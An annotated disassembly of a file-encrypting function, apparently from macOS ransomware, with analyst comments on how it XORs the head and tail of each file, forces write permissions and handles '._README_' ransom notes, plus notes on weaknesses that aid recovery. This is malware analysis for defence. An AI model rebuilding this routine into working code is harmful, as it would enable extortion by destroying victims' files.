- ┌ (fcn) func.homemade.encrypt_file_with_XOR 1565
- │ func.homemade.encrypt_file_with_XOR (); ; one argument: rdi -> { char *path; uint64_t key } (path read at [rdi], key at [rdi+8]); XORs the file in place 8 bytes at a time with that key, but only the first 100 KiB (0x19000 bytes) and the last up-to-100 KiB; always returns 0 (no error reporting to the caller)
- │ ; var int local_19058h @ rbp-0x19058
- │ ; var int local_19054h @ rbp-0x19054
- │ ; var int local_19050h @ rbp-0x19050
- │ ; var int local_19040h @ rbp-0x19040
- │ ; var int local_1903ch @ rbp-0x1903c
- │ ; var int local_19030h @ rbp-0x19030
- │ ; var int local_30h @ rbp-0x30
- │ ; CALL XREF from 0x10000212a (func.homemade.pick_random_key)
- │ ; DATA XREF from 0x100001985 (entry0)
- │ 0x100002160 55 push rbp
- │ 0x100002161 4889e5 mov rbp, rsp
- │ 0x100002164 4157 push r15
- │ 0x100002166 4156 push r14
- │ 0x100002168 4155 push r13
- │ 0x10000216a 4154 push r12
- │ 0x10000216c 53 push rbx
- │ 0x10000216d 4881ec389001. sub rsp, 0x19038
- │ 0x100002174 488b05850e00. mov rax, qword [reloc.__stack_chk_guard_0] ; [0x100003000:8]=0
- │ 0x10000217b 488b00 mov rax, qword [rax]
- │ 0x10000217e 488945d0 mov qword [local_30h], rax
- │ 0x100002182 488b1f mov rbx, qword [rdi]
- │ 0x100002185 4c8b6f08 mov r13, qword [rdi + 8] ; [0x8:8]=0x280000003
- │ 0x100002189 4889df mov rdi, rbx ; const char * s
- │ 0x10000218c e861070000 call sym.imp.strlen ; size_t strlen(const char *s)
- │ 0x100002191 48c1e020 shl rax, 0x20
- │ 0x100002195 48b900000000. movabs rcx, 0xffffffff00000000
- │ 0x10000219f 4801c1 add rcx, rax ; '#'
- │ 0x1000021a2 48c1f920 sar rcx, 0x20
- │ 0x1000021a6 803c0b5f cmp byte [rbx + rcx], 0x5f ; [0x5f:1]=0 ; '_' ; s[len-1] == '_': first of nine back-to-front byte checks that together match the suffix "._README_". There is no len >= 9 guard before indexing, so a short name that matches the first checks (e.g. "_") reads before the start of the string (out-of-bounds read)
- │ ┌─< 0x1000021aa 0f85c1010000 jne 0x100002371
- │ │ 0x1000021b0 48b900000000. movabs rcx, 0xfffffffe00000000
- │ │ 0x1000021ba 4801c1 add rcx, rax ; '#'
- │ │ 0x1000021bd 48c1f920 sar rcx, 0x20
- │ │ 0x1000021c1 803c0b45 cmp byte [rbx + rcx], 0x45 ; [0x45:1]=0 ; 'E'
- │ ┌──< 0x1000021c5 0f85a6010000 jne 0x100002371
- │ ││ 0x1000021cb 48b900000000. movabs rcx, 0xfffffffd00000000
- │ ││ 0x1000021d5 4801c1 add rcx, rax ; '#'
- │ ││ 0x1000021d8 48c1f920 sar rcx, 0x20
- │ ││ 0x1000021dc 803c0b4d cmp byte [rbx + rcx], 0x4d ; [0x4d:1]=0 ; 'M'
- │ ┌───< 0x1000021e0 0f858b010000 jne 0x100002371
- │ │││ 0x1000021e6 48b900000000. movabs rcx, 0xfffffffc00000000
- │ │││ 0x1000021f0 4801c1 add rcx, rax ; '#'
- │ │││ 0x1000021f3 48c1f920 sar rcx, 0x20
- │ │││ 0x1000021f7 803c0b44 cmp byte [rbx + rcx], 0x44 ; [0x44:1]=1 ; 'D'
- │ ┌────< 0x1000021fb 0f8570010000 jne 0x100002371
- │ ││││ 0x100002201 48b900000000. movabs rcx, 0xfffffffb00000000
- │ ││││ 0x10000220b 4801c1 add rcx, rax ; '#'
- │ ││││ 0x10000220e 48c1f920 sar rcx, 0x20
- │ ││││ 0x100002212 803c0b41 cmp byte [rbx + rcx], 0x41 ; [0x41:1]=0 ; 'A'
- │ ┌─────< 0x100002216 0f8555010000 jne 0x100002371
- │ │││││ 0x10000221c 48b900000000. movabs rcx, 0xfffffffa00000000
- │ │││││ 0x100002226 4801c1 add rcx, rax ; '#'
- │ │││││ 0x100002229 48c1f920 sar rcx, 0x20
- │ │││││ 0x10000222d 803c0b45 cmp byte [rbx + rcx], 0x45 ; [0x45:1]=0 ; 'E'
- │ ┌──────< 0x100002231 0f853a010000 jne 0x100002371
- │ ││││││ 0x100002237 48b900000000. movabs rcx, 0xfffffff900000000
- │ ││││││ 0x100002241 4801c1 add rcx, rax ; '#'
- │ ││││││ 0x100002244 48c1f920 sar rcx, 0x20
- │ ││││││ 0x100002248 803c0b52 cmp byte [rbx + rcx], 0x52 ; [0x52:1]=0 ; 'R'
- │ ┌───────< 0x10000224c 0f851f010000 jne 0x100002371
- │ │││││││ 0x100002252 48b900000000. movabs rcx, 0xfffffff800000000
- │ │││││││ 0x10000225c 4801c1 add rcx, rax ; '#'
- │ │││││││ 0x10000225f 48c1f920 sar rcx, 0x20
- │ │││││││ 0x100002263 803c0b5f cmp byte [rbx + rcx], 0x5f ; [0x5f:1]=0 ; '_'
- │ ────────< 0x100002267 0f8504010000 jne 0x100002371
- │ │││││││ 0x10000226d 48b900000000. movabs rcx, 0xfffffff700000000
- │ │││││││ 0x100002277 4801c8 add rax, rcx ; '&'
- │ │││││││ 0x10000227a 48c1f820 sar rax, 0x20
- │ │││││││ 0x10000227e 803c032e cmp byte [rbx + rax], 0x2e ; [0x2e:1]=90 ; '.' ; s[len-9] == '.': all nine checks passed, the filename ends in "._README_" (ransom-note path below, keyed from a decoded constant rather than the per-file key in r13)
- │ ────────< 0x100002282 0f85e9000000 jne 0x100002371
- │ │││││││ 0x100002288 660f6f05000d. movdqa xmm0, xmmword [0x100002f90]
- │ │││││││ 0x100002290 660f7f85b06f. movdqa xmmword [local_19050h], xmm0
- │ │││││││ 0x100002298 c785c06ffeff. mov dword [local_19040h], 0xf7ab8069
- │ │││││││ 0x1000022a2 c685c46ffeff. mov byte [local_1903ch], 0
- │ │││││││ 0x1000022a9 488dbdb06ffe. lea rdi, [local_19050h]
- │ │││││││ 0x1000022b0 e87bfcffff call func.homemade.decode_buffer
- │ │││││││ 0x1000022b5 31f6 xor esi, esi ; char* *endptr
- │ │││││││ 0x1000022b7 ba0a000000 mov edx, 0xa ; int base
- │ │││││││ 0x1000022bc 4889c7 mov rdi, rax ; const char * str
- │ │││││││ 0x1000022bf e834060000 call sym.imp.strtol ; long strtol(const char *str, char**endptr, int base)
- │ │││││││ 0x1000022c4 4989c6 mov r14, rax ; r14 = strtol(decode_buffer(blob), NULL, 10): the key for "._README_" files comes from a 21-byte constant (16 bytes from 0x100002f90 + 0xf7ab8069 + NUL), so assuming decode_buffer is deterministic these files can be decoded statically from the binary without the per-file key
- │ │││││││ 0x1000022c7 c785a86ffeff. mov dword [local_19058h], 0x2b6272 ; "rb+"
- │ │││││││ 0x1000022d1 488db5a86ffe. lea rsi, [local_19058h] ; const char*
- │ │││││││ 0x1000022d8 4889df mov rdi, rbx ; const char * filename
- │ │││││││ 0x1000022db e894050000 call sym.imp.fopen ; file*fopen(const char *filename,
- │ │││││││ 0x1000022e0 4989c7 mov r15, rax ; r15 = FILE*; no NULL check before the fread below - a failed fopen passes NULL straight into fread
- │ │││││││ 0x1000022e3 488dbdd06ffe. lea rdi, [local_19030h] ; void *ptr
- │ │││││││ 0x1000022ea be08000000 mov esi, 8 ; size_t
- │ │││││││ 0x1000022ef ba00320000 mov edx, 0x3200 ; size_t
- │ │││││││ 0x1000022f4 4c89f9 mov rcx, r15 ; FILE *stream
- │ │││││││ 0x1000022f7 e884050000 call sym.imp.fread ; size_t fread(void *ptr, FILE *stream)
- │ │││││││ 0x1000022fc 4889c3 mov rbx, rax
- │ │││││││ 0x1000022ff 4885db test rbx, rbx
- │ ────────< 0x100002302 0f84e2030000 je 0x1000026ea
- │ │││││││ 0x100002308 4883fb03 cmp rbx, 3
- │ ────────< 0x10000230c 0f86bc030000 jbe 0x1000026ce
- │ │││││││ 0x100002312 4889d8 mov rax, rbx
- │ │││││││ 0x100002315 4883e0fc and rax, 0xfffffffffffffffc
- │ ────────< 0x100002319 0f84af030000 je 0x1000026ce
- │ │││││││ 0x10000231f 66490f6ec6 movq xmm0, r14
- │ │││││││ 0x100002324 660f70c044 pshufd xmm0, xmm0, 0x44
- │ │││││││ 0x100002329 488d50fc lea rdx, [rax - 4]
- │ │││││││ 0x10000232d 4889d1 mov rcx, rdx
- │ │││││││ 0x100002330 48c1e902 shr rcx, 2
- │ │││││││ 0x100002334 480fbae202 bt rdx, 2
- │ ────────< 0x100002339 0f82d6030000 jb 0x100002715
- │ │││││││ 0x10000233f 660f6f8dd06f. movdqa xmm1, xmmword [local_19030h]
- │ │││││││ 0x100002347 660fefc8 pxor xmm1, xmm0
- │ │││││││ 0x10000234b 660f6f95e06f. movdqa xmm2, xmmword [rbp - 0x19020]
- │ │││││││ 0x100002353 660fefd0 pxor xmm2, xmm0
- │ │││││││ 0x100002357 660f7f8dd06f. movdqa xmmword [local_19030h], xmm1
- │ │││││││ 0x10000235f 660f7f95e06f. movdqa xmmword [rbp - 0x19020], xmm2
- │ │││││││ 0x100002367 ba04000000 mov edx, 4
- │ ────────< 0x10000236c e9a6030000 jmp 0x100002717
- │ └└└└└└└─> 0x100002371 be02000000 mov esi, 2 ; normal path (name does not end in "._README_"): access(path, W_OK=2); 0 means writable, skip the chmod
- │ 0x100002376 4889df mov rdi, rbx
- │ 0x100002379 e8b4040000 call sym.imp.access
- │ 0x10000237e 85c0 test eax, eax
- │ ┌─< 0x100002380 742d je 0x1000023af
- │ │ 0x100002382 be01000000 mov esi, 1 ; if file is readable
- │ │ 0x100002387 4889df mov rdi, rbx
- │ │ 0x10000238a e8a3040000 call sym.imp.access
- │ │ 0x10000238f 85c0 test eax, eax
- │ ┌──< 0x100002391 7407 je 0x10000239a
- │ ││ 0x100002393 be80010000 mov esi, 0x180 ; mode 0600 (owner rw) when the file was neither writable nor readable
- │ ┌───< 0x100002398 eb05 jmp 0x10000239f
- │ │└──> 0x10000239a bec0010000 mov esi, 0x1c0 ; int mode ; mode 0700 (owner rwx) when the file was readable but not writable
- │ │ │ ; JMP XREF from 0x100002398 (func.homemade.encrypt_file_with_XOR)
- │ └───> 0x10000239f 4889df mov rdi, rbx ; const char * path try to chmod it
- │ │ 0x1000023a2 e8a3040000 call sym.imp.chmod ; int chmod(const char *path, int mode)
- │ │ 0x1000023a7 85c0 test eax, eax
- │ ┌──< 0x1000023a9 0f851c020000 jne 0x1000025cb
- │ │└─> 0x1000023af c785ac6ffeff. mov dword [local_19054h], 0x2b6272 ; successfully changed perms file is (now) writable
- open with rb+
- │ │ 0x1000023b9 488db5ac6ffe. lea rsi, [local_19054h] ; const char*
- │ │ 0x1000023c0 4889df mov rdi, rbx ; const char * filename
- │ │ 0x1000023c3 e8ac040000 call sym.imp.fopen ; file*fopen(const char *filename,
- │ │ 0x1000023c8 4989c4 mov r12, rax ; r12 = FILE*; never tested for NULL - if fopen fails (e.g. chmod succeeded but the open still fails) fread below is called with a NULL stream
- │ │ 0x1000023cb 488dbdd06ffe. lea rdi, [local_19030h] ; void *ptr
- │ │ 0x1000023d2 be08000000 mov esi, 8 ; size_t
- │ │ 0x1000023d7 ba00320000 mov edx, 0x3200 ; size_t
- │ │ 0x1000023dc 4c89e1 mov rcx, r12 ; FILE *stream
- │ │ 0x1000023df e89c040000 call sym.imp.fread ; size_t fread(void *ptr, FILE *stream)
- │ │ 0x1000023e4 4889c3 mov rbx, rax
- │ │ 0x1000023e7 4885db test rbx, rbx
- │ │┌─< 0x1000023ea 0f848c000000 je 0x10000247c
- │ ││ 0x1000023f0 4883fb03 cmp rbx, 3 ; rbx = number of 8-byte items fread returned (size = 8, so these are qwords, not bytes); 3 or fewer qwords -> scalar XOR loop, no SSE
- │ ┌───< 0x1000023f4 765b jbe 0x100002451
- │ │││ 0x1000023f6 4889d8 mov rax, rbx ; rax = rbx & ~3: qword count rounded down to a multiple of 4 (the SSE loop does 4 qwords per step; the 1-3 leftover qwords go to the scalar loop at 0x100002453)
- │ │││ 0x1000023f9 4883e0fc and rax, 0xfffffffffffffffc
- │ ┌────< 0x1000023fd 7452 je 0x100002451
- │ ││││ 0x1000023ff 66490f6ec5 movq xmm0, r13 ; xmm0.lo = key; the pshufd 0x44 below copies the low qword into the high lane, so xmm0 = key:key and a single pxor XORs 16 bytes with the key (this is not a no-op)
- │ ││││ 0x100002404 660f70c044 pshufd xmm0, xmm0, 0x44
- │ ││││ 0x100002409 488d50fc lea rdx, [rax - 4]
- │ ││││ 0x10000240d 4889d1 mov rcx, rdx
- │ ││││ 0x100002410 48c1e902 shr rcx, 2
- │ ││││ 0x100002414 480fbae202 bt rdx, 2
- │ ┌─────< 0x100002419 0f82d4010000 jb 0x1000025f3
- │ │││││ 0x10000241f 660f6f8dd06f. movdqa xmm1, xmmword [local_19030h] ; xmm1 = buffer XOR r13
- xmm2 = next 16 bytes of the buffer (rbp-0x19020 = buffer+16) XOR r13
- this is not junk code: it is the compiler's peeled first iteration of the auto-vectorized XOR loop,
- taken when the number of 4-qword groups is odd (bt rdx,2 above); it XORs qwords 0..3 and sets edx = 4
- so the 64-byte-per-iteration loop at 0x100002610 continues from qword 4
- │ │││││ 0x100002427 660fefc8 pxor xmm1, xmm0
- │ │││││ 0x10000242b 660f6f95e06f. movdqa xmm2, xmmword [rbp - 0x19020]
- │ │││││ 0x100002433 660fefd0 pxor xmm2, xmm0
- │ │││││ 0x100002437 660f7f8dd06f. movdqa xmmword [local_19030h], xmm1
- │ │││││ 0x10000243f 660f7f95e06f. movdqa xmmword [rbp - 0x19020], xmm2
- │ │││││ 0x100002447 ba04000000 mov edx, 4
- │ ┌──────< 0x10000244c e9a4010000 jmp 0x1000025f5
- │ ││└└───> 0x100002451 31c0 xor eax, eax
- │ ││ ┌───> 0x100002453 488d8cc5d06f. lea rcx, [rbp + rax*8 - 0x19030] ; scalar remainder loop: rcx = &buf[rax], rax = qwords already XORed by the SSE loop (0 when fewer than 4 qwords were read)
- rdx = rbx - rax = qwords still to XOR; always >= 1 on this path, so the dec/jne loop below never underflows
- │ ││ |││ 0x10000245b 4889da mov rdx, rbx
- │ ││ |││ 0x10000245e 4829c2 sub rdx, rax
- │ ││ |││ 0x100002461 666666666666. nop word cs:[rax + rax]
- │ ││┌────> 0x100002470 4c3129 xor qword [rcx], r13
- │ ││||││ 0x100002473 4883c108 add rcx, 8
- │ ││||││ 0x100002477 48ffca dec rdx
- │ ││└────< 0x10000247a 75f4 jne 0x100002470
- │ ││ ↑││ ; JMP XREF from 0x100002659 (func.homemade.encrypt_file_with_XOR)
- │ ││┌──└─> 0x10000247c 31f6 xor esi, esi ; every qword XORed (or nothing was read): fseek(fp, 0, SEEK_SET) and overwrite the file head in place with fwrite(buf, 8, rbx, fp)
- │ ││||│ 0x10000247e 31d2 xor edx, edx ; int
- │ ││||│ 0x100002480 4c89e7 mov rdi, r12 ; FILE *stream
- │ ││||│ 0x100002483 e8fe030000 call sym.imp.fseek ; int fseek(FILE *stream,
- │ ││||│ 0x100002488 488dbdd06ffe. lea rdi, [local_19030h] ; const void *ptr
- │ ││||│ 0x10000248f be08000000 mov esi, 8 ; size_t size
- │ ││||│ 0x100002494 4889da mov rdx, rbx ; size_t nitems
- │ ││||│ 0x100002497 4c89e1 mov rcx, r12 ; FILE *stream
- │ ││||│ 0x10000249a e8f3030000 call sym.imp.fwrite ; fwrite(buf, 8, rbx, fp) - ptr, size, nitems, stream ; size_t fwrite(const void *ptr, size_t size, size_t nitems, FILE *stream)
- │ ││||│ 0x10000249f 4881fb003200. cmp rbx, 0x3200
- │ ││||│┌─< 0x1000024a6 0f8517010000 jne 0x1000025c3
- │ ││||││ 0x1000024ac 31f6 xor esi, esi ; reached only when fread filled the whole 0x3200*8 = 102400-byte buffer; a short read means the file fit in the buffer and is already fully XORed, so the jne above goes straight to fclose
- the next three loads are just fseek(fp, 0, SEEK_END) with the registers assigned in the order the compiler chose (esi = offset, edx = whence, rdi = stream); nothing is out of order
- │ ││||││ 0x1000024ae ba02000000 mov edx, 2 ; int
- │ ││||││ 0x1000024b3 4c89e7 mov rdi, r12 ; FILE *stream
- │ ││||││ 0x1000024b6 e8cb030000 call sym.imp.fseek ; int fseek(FILE *stream,
- │ ││||││ 0x1000024bb 4c89e7 mov rdi, r12 ; FILE *stream
- │ ││||││ 0x1000024be e8c9030000 call sym.imp.ftell ; long ftell(FILE *stream)
- │ ││||││ 0x1000024c3 48050070feff add rax, 0xfffffffffffe7000
- │ ││||││ 0x1000024c9 483d00900100 cmp rax, 0x19000
- │ ││||││ 0x1000024cf bb00900100 mov ebx, 0x19000
- │ ││||││ 0x1000024d4 480f4ed8 cmovle rbx, rax
- │ ││||││ 0x1000024d8 4989de mov r14, rbx
- │ ││||││ 0x1000024db 49c1ee03 shr r14, 3
- │ ┌───────< 0x1000024df 0f84de000000 je 0x1000025c3
- │ │││||││ 0x1000024e5 4e8d3cf50000. lea r15, [r14*8] ; r14 = min(filesize - 0x19000, 0x19000) / 8 = qwords of tail to process (ftell/cmovle above); r15 = -(r14*8)
- this does NOT seek to the beginning: fseek(fp, -(r14*8), SEEK_END) positions at the start of the last up-to-100 KiB. Only the first 100 KiB and the last 100 KiB of a file are ever XORed; anything in between stays plaintext, so files larger than 200 KiB remain partially recoverable (a speed shortcut, not obfuscation)
- │ │││||││ 0x1000024ed 49f7df neg r15
- │ │││||││ 0x1000024f0 ba02000000 mov edx, 2 ; int
- │ │││||││ 0x1000024f5 4c89e7 mov rdi, r12 ; FILE *stream
- │ │││||││ 0x1000024f8 4c89fe mov rsi, r15 ; long
- │ │││||││ 0x1000024fb e886030000 call sym.imp.fseek ; int fseek(FILE *stream,
- │ │││||││ 0x100002500 488dbdd06ffe. lea rdi, [local_19030h] ; void *ptr
- │ │││||││ 0x100002507 be08000000 mov esi, 8 ; size_t
- │ │││||││ 0x10000250c 4c89f2 mov rdx, r14 ; size_t
- │ │││||││ 0x10000250f 4c89e1 mov rcx, r12 ; FILE *stream
- │ │││||││ 0x100002512 e869030000 call sym.imp.fread ; size_t fread(void *ptr, FILE *stream) ; return value (rax) is discarded - the XOR loops and the fwrite below use the requested count r14, not the number of qwords actually read
- │ │││||││ 0x100002517 4883fb1f cmp rbx, 0x1f
- │ ────────< 0x10000251b 7661 jbe 0x10000257e
- │ │││||││ 0x10000251d 48b8fcffffff. movabs rax, 0x1ffffffffffffffc ; not -4: a mask that rounds r14 (tail qword count) down to a multiple of 4 for the SSE loop, same shape as the head pass
- │ │││||││ 0x100002527 4c21f0 and rax, r14
- │ ────────< 0x10000252a 7452 je 0x10000257e
- │ │││||││ 0x10000252c 66490f6ec5 movq xmm0, r13
- │ │││||││ 0x100002531 660f70c044 pshufd xmm0, xmm0, 0x44
- │ │││||││ 0x100002536 488d50fc lea rdx, [rax - 4]
- │ │││||││ 0x10000253a 4889d1 mov rcx, rdx
- │ │││||││ 0x10000253d 48c1e902 shr rcx, 2
- │ │││||││ 0x100002541 480fbae202 bt rdx, 2
- │ ────────< 0x100002546 0f8212010000 jb 0x10000265e
- │ │││||││ 0x10000254c 660f6f8dd06f. movdqa xmm1, xmmword [local_19030h]
- │ │││||││ 0x100002554 660fefc8 pxor xmm1, xmm0
- │ │││||││ 0x100002558 660f6f95e06f. movdqa xmm2, xmmword [rbp - 0x19020]
- │ │││||││ 0x100002560 660fefd0 pxor xmm2, xmm0
- │ │││||││ 0x100002564 660f7f8dd06f. movdqa xmmword [local_19030h], xmm1
- │ │││||││ 0x10000256c 660f7f95e06f. movdqa xmmword [rbp - 0x19020], xmm2
- │ │││||││ 0x100002574 ba04000000 mov edx, 4
- │ ────────< 0x100002579 e9e2000000 jmp 0x100002660
- │ ────────> 0x10000257e 31c0 xor eax, eax ; scalar path for the tail: taken when the tail is under 32 bytes or fewer than 4 qwords remain; rax = qwords already done (0 here, rax from the SSE loop when entered at 0x100002580)
- │ ────────> 0x100002580 488d8cc5d06f. lea rcx, [rbp + rax*8 - 0x19030] ; rcx = start of buffer
- rdx is how far is left to go
- │ │││||││ 0x100002588 4c89f2 mov rdx, r14
- │ │││||││ 0x10000258b 4829c2 sub rdx, rax
- │ │││||││ 0x10000258e 6690 nop
- │ ────────> 0x100002590 4c3129 xor qword [rcx], r13 ; xor the buffer by r13, 8 bytes at a time
- │ │││||││ 0x100002593 4883c108 add rcx, 8
- │ │││||││ 0x100002597 48ffca dec rdx
- │ ────────< 0x10000259a 75f4 jne 0x100002590
- │ │││↑↑││ ; JMP XREF from 0x1000026c9 (func.homemade.encrypt_file_with_XOR)
- │ ────────> 0x10000259c ba02000000 mov edx, 2 ; SEEK_END; fseek(fp, r15, SEEK_END) with r15 = -(r14*8) returns to the tail start, then fwrite(buf, 8, r14, fp) overwrites the tail in place with the XORed buffer
- │ │││||││ 0x1000025a1 4c89e7 mov rdi, r12 ; FILE *stream
- │ │││||││ 0x1000025a4 4c89fe mov rsi, r15 ; long
- │ │││||││ 0x1000025a7 e8da020000 call sym.imp.fseek ; int fseek(FILE *stream,
- │ │││||││ 0x1000025ac 488dbdd06ffe. lea rdi, [local_19030h] ; const void *ptr
- │ │││||││ 0x1000025b3 be08000000 mov esi, 8 ; size_t size
- │ │││||││ 0x1000025b8 4c89f2 mov rdx, r14 ; size_t nitems
- │ │││||││ 0x1000025bb 4c89e1 mov rcx, r12 ; FILE *stream
- │ │││||││ 0x1000025be e8cf020000 call sym.imp.fwrite ; size_t fwrite(const void *ptr, size_t size, size_t nitems, FILE *stream)
- │ └─────└─> 0x1000025c3 4c89e7 mov rdi, r12 ; FILE *stream
- │ ││↑↑│ ; JMP XREF from 0x100002710 (func.homemade.encrypt_file_with_XOR)
- │ ││||│┌─> 0x1000025c6 e89d020000 call sym.imp.fclose ; int fclose(FILE *stream)
- │ ││||└──> 0x1000025cb 488b052e0a00. mov rax, qword [reloc.__stack_chk_guard_0] ; [0x100003000:8]=0 ; common epilogue: stack-cookie check then return 0; reached by fallthrough after fclose and by the jump from a failed chmod, so the caller cannot tell success from failure
- │ ││|| | 0x1000025d2 488b00 mov rax, qword [rax]
- │ ││|| | 0x1000025d5 483b45d0 cmp rax, qword [local_30h]
- │ ││||┌──< 0x1000025d9 0f8599010000 jne 0x100002778
- │ ││||│| 0x1000025df 31c0 xor eax, eax
- │ ││||│| 0x1000025e1 4881c4389001. add rsp, 0x19038
- │ ││||│| 0x1000025e8 5b pop rbx
- │ ││||│| 0x1000025e9 415c pop r12
- │ ││||│| 0x1000025eb 415d pop r13
- │ ││||│| 0x1000025ed 415e pop r14
- │ ││||│| 0x1000025ef 415f pop r15
- │ ││||│| 0x1000025f1 5d pop rbp
- │ ││||│| 0x1000025f2 c3 ret
- │ │└─────> 0x1000025f3 31d2 xor edx, edx
- │ │ ↑↑│↑ ; JMP XREF from 0x10000244c (func.homemade.encrypt_file_with_XOR)
- │ └──────> 0x1000025f5 4885c9 test rcx, rcx ; rcx = (rax - 4) >> 2 (right shift, not left): the number of 4-qword groups left after the peeled one; zero skips the unrolled SSE loop
- │ ┌─────< 0x1000025f8 7456 je 0x100002650
- │ │||│| 0x1000025fa 4889c1 mov rcx, rax ; rcx = rax - rdx = qwords the unrolled loop must cover (rdx is 0 or 4 depending on the peel); rdx then becomes &buf[rdx] + 0x30 so the -0x30/-0x20/-0x10/0 displacements walk 64 bytes per iteration
- │ │||│| 0x1000025fd 4829d1 sub rcx, rdx
- │ │||│| 0x100002600 488d94d50070. lea rdx, [rbp + rdx*8 - 0x19000]
- │ │||│| 0x100002608 0f1f84000000. nop dword [rax + rax]
- | ┌──────> ;-- possible_xor_encrypt_of_file_buffer:
- │ ┌──────> 0x100002610 660f6f4ad0 movdqa xmm1, xmmword [rdx - 0x30] ; loop-di-loop more xmm instructions
- xmm0 was loaded earlier (movq xmm0, r13 / pshufd xmm0, xmm0, 0x44 at 0x1000023ff): it holds the key broadcast to both lanes, and each iteration XORs 64 bytes = 8 qwords of the buffer with it
- │ |│||│| 0x100002615 660fefc8 pxor xmm1, xmm0
- │ |│||│| 0x100002619 660f6f52e0 movdqa xmm2, xmmword [rdx - 0x20]
- │ |│||│| 0x10000261e 660fefd0 pxor xmm2, xmm0
- │ |│||│| 0x100002622 660f7f4ad0 movdqa xmmword [rdx - 0x30], xmm1
- │ |│||│| 0x100002627 660f7f52e0 movdqa xmmword [rdx - 0x20], xmm2
- │ |│||│| 0x10000262c 660f6f4af0 movdqa xmm1, xmmword [rdx - 0x10]
- │ |│||│| 0x100002631 660fefc8 pxor xmm1, xmm0
- │ |│||│| 0x100002635 660f6f12 movdqa xmm2, xmmword [rdx]
- │ |│||│| 0x100002639 660fefd0 pxor xmm2, xmm0
- │ |│||│| 0x10000263d 660f7f4af0 movdqa xmmword [rdx - 0x10], xmm1
- │ |│||│| 0x100002642 660f7f12 movdqa xmmword [rdx], xmm2
- │ |│||│| 0x100002646 4883c240 add rdx, 0x40 ; '@'
- │ |│||│| 0x10000264a 4883c1f8 add rcx, 0xfffffffffffffff8
- │ └──────< 0x10000264e 75c0 jne 0x100002610
- │ └─────> 0x100002650 4839c3 cmp rbx, rax ; after loop is done
- not a tamper check: rax = rbx & ~3 (from 0x1000023f6), so rbx != rax whenever the qword count is not a multiple of 4; the jne falls into the scalar loop at 0x100002453 to XOR the 1-3 leftover qwords
- │ |└───< 0x100002653 0f85fafdffff jne 0x100002453
- │ └────< 0x100002659 e91efeffff jmp 0x10000247c ; count was a multiple of 4: nothing left, go seek to 0 and write the buffer back
- │ ────────> 0x10000265e 31d2 xor edx, edx
- │ │↑ ; JMP XREF from 0x100002579 (func.homemade.encrypt_file_with_XOR)
- │ ────────> 0x100002660 4885c9 test rcx, rcx
- │ ┌───< 0x100002663 745b je 0x1000026c0
- │ ││| 0x100002665 4889c1 mov rcx, rax
- │ ││| 0x100002668 4829d1 sub rcx, rdx
- │ ││| 0x10000266b 488d94d50070. lea rdx, [rbp + rdx*8 - 0x19000]
- │ ││| 0x100002673 666666662e0f. nop word cs:[rax + rax]
- │ ┌────> 0x100002680 660f6f4ad0 movdqa xmm1, xmmword [rdx - 0x30]
- │ |││| 0x100002685 660fefc8 pxor xmm1, xmm0
- │ |││| 0x100002689 660f6f52e0 movdqa xmm2, xmmword [rdx - 0x20]
- │ |││| 0x10000268e 660fefd0 pxor xmm2, xmm0
- │ |││| 0x100002692 660f7f4ad0 movdqa xmmword [rdx - 0x30], xmm1
- │ |││| 0x100002697 660f7f52e0 movdqa xmmword [rdx - 0x20], xmm2
- │ |││| 0x10000269c 660f6f4af0 movdqa xmm1, xmmword [rdx - 0x10]
- │ |││| 0x1000026a1 660fefc8 pxor xmm1, xmm0
- │ |││| 0x1000026a5 660f6f12 movdqa xmm2, xmmword [rdx]
- │ |││| 0x1000026a9 660fefd0 pxor xmm2, xmm0
- │ |││| 0x1000026ad 660f7f4af0 movdqa xmmword [rdx - 0x10], xmm1
- │ |││| 0x1000026b2 660f7f12 movdqa xmmword [rdx], xmm2
- │ |││| 0x1000026b6 4883c240 add rdx, 0x40 ; '@'
- │ |││| 0x1000026ba 4883c1f8 add rcx, 0xfffffffffffffff8
- │ └────< 0x1000026be 75c0 jne 0x100002680
- │ └───> 0x1000026c0 4939c6 cmp r14, rax
- │ ────────< 0x1000026c3 0f85b7feffff jne 0x100002580
- │ ────────< 0x1000026c9 e9cefeffff jmp 0x10000259c
- │ ────────> 0x1000026ce 31c0 xor eax, eax
- │ ┌───> 0x1000026d0 488d8cc5d06f. lea rcx, [rbp + rax*8 - 0x19030]
- │ |│| 0x1000026d8 4889da mov rdx, rbx
- │ |│| 0x1000026db 4829c2 sub rdx, rax
- │ ┌────> 0x1000026de 4c3131 xor qword [rcx], r14
- │ ||│| 0x1000026e1 4883c108 add rcx, 8
- │ ||│| 0x1000026e5 48ffca dec rdx
- │ └────< 0x1000026e8 75f4 jne 0x1000026de
- │ ↑│↑ ; JMP XREF from 0x100002773 (func.homemade.encrypt_file_with_XOR)
- │ ───┌────> 0x1000026ea 31f6 xor esi, esi ; long
- │ ||│| 0x1000026ec 31d2 xor edx, edx ; int
- │ ||│| 0x1000026ee 4c89ff mov rdi, r15 ; FILE *stream
- │ ||│| 0x1000026f1 e890010000 call sym.imp.fseek ; int fseek(FILE *stream,
- │ ||│| 0x1000026f6 488dbdd06ffe. lea rdi, [local_19030h] ; const void *ptr
- │ ||│| 0x1000026fd be08000000 mov esi, 8 ; size_t size
- │ ||│| 0x100002702 4889da mov rdx, rbx ; size_t nitems
- │ ||│| 0x100002705 4c89f9 mov rcx, r15 ; FILE *stream
- │ ||│| 0x100002708 e885010000 call sym.imp.fwrite ; size_t fwrite(const void *ptr, size_t size, size_t nitems, FILE *stream)
- │ ||│| 0x10000270d 4c89ff mov rdi, r15
- │ ||│└─< 0x100002710 e9b1feffff jmp 0x1000025c6
- │ ────────> 0x100002715 31d2 xor edx, edx
- │ ↑↑│ ; JMP XREF from 0x10000236c (func.homemade.encrypt_file_with_XOR)
- │ ────────> 0x100002717 4885c9 test rcx, rcx
- │ ||│┌─< 0x10000271a 744e je 0x10000276a
- │ ||││ 0x10000271c 4889c1 mov rcx, rax
- │ ||││ 0x10000271f 4829d1 sub rcx, rdx
- │ ||││ 0x100002722 488d94d50070. lea rdx, [rbp + rdx*8 - 0x19000]
- │ ┌─────> 0x10000272a 660f6f4ad0 movdqa xmm1, xmmword [rdx - 0x30]
- │ |||││ 0x10000272f 660fefc8 pxor xmm1, xmm0
- │ |||││ 0x100002733 660f6f52e0 movdqa xmm2, xmmword [rdx - 0x20]
- │ |||││ 0x100002738 660fefd0 pxor xmm2, xmm0
- │ |||││ 0x10000273c 660f7f4ad0 movdqa xmmword [rdx - 0x30], xmm1
- │ |||││ 0x100002741 660f7f52e0 movdqa xmmword [rdx - 0x20], xmm2
